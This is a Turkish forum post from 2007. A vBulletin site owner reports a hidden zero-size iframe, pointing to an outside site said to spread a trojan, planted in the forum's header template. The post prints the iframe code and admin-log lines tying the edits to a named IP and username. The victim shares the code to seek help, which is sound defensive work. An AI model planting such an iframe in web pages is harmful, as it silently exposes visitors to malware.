vbulletin forumda Şablon: headinclude (İD´si: 1374) içinde aşağıdaki kodları buldumda bu kodlar oraya nasıl yerleşmiş? Bunu çözemiyorum.. Ve bu sitedende trojan giriyor.
<iframe src="http://silkroadteam.com" border=0 scrolling="no" align="MIDDLE" width="0" height="0" frameborder="No"></iframe>
3 yıldır kullandığım forumda açık çıktı
12
●856
- 31-12-2007, 05:34:14Panel kullanımlarında farklı bir ip gördüm ve "admin" kullanıcısıyla girilmiş. İp'den arama yaptım 88.231.138.248 böyle bir ip çıktı. Bu kesinlikle benim ipim deildi. Bu ipten üye arattım bu sefer karşıma
lotuss34 88.231.138.248 [Kullanıcının Mesajlarını ara] [Üyeye ait diğer İP-Adreslerini ara]
Ve lotuss34 mesajlarını arattığımda 2 adet mesaj çıktı ve içeriğide o iframe şeklinde yayınlanan sitenin ismiydi. Bu lotus denen şahıs "admin" şifremle panele girip sitesini iframe eklemiş ama bu nasıl oluyor. Şifrem rakam harf karışımı uzun birşey. Nasıl oluyorda ele geçiriyor şifreyi. - 31-12-2007, 07:02:5831426 Admin 12:26, 31st Dec 2007 css.php edit style id = 1 88.231.138.248
31425 Admin 12:26, 31st Dec 2007 css.php update style id = 1 88.231.138.248
31424 Admin 12:26, 31st Dec 2007 css.php edit style id = 1 88.231.138.248
31423 Admin 12:26, 31st Dec 2007 template.php modify 88.231.138.248
İstatistiklerden gördüğüm kadarıyla yukardaki işlemleri yapmış bu şahıs. Şimdi merak ettiğim şifremimi bi şekilde buldu? Yoksa herhangi bir açıktanmı yararlandı?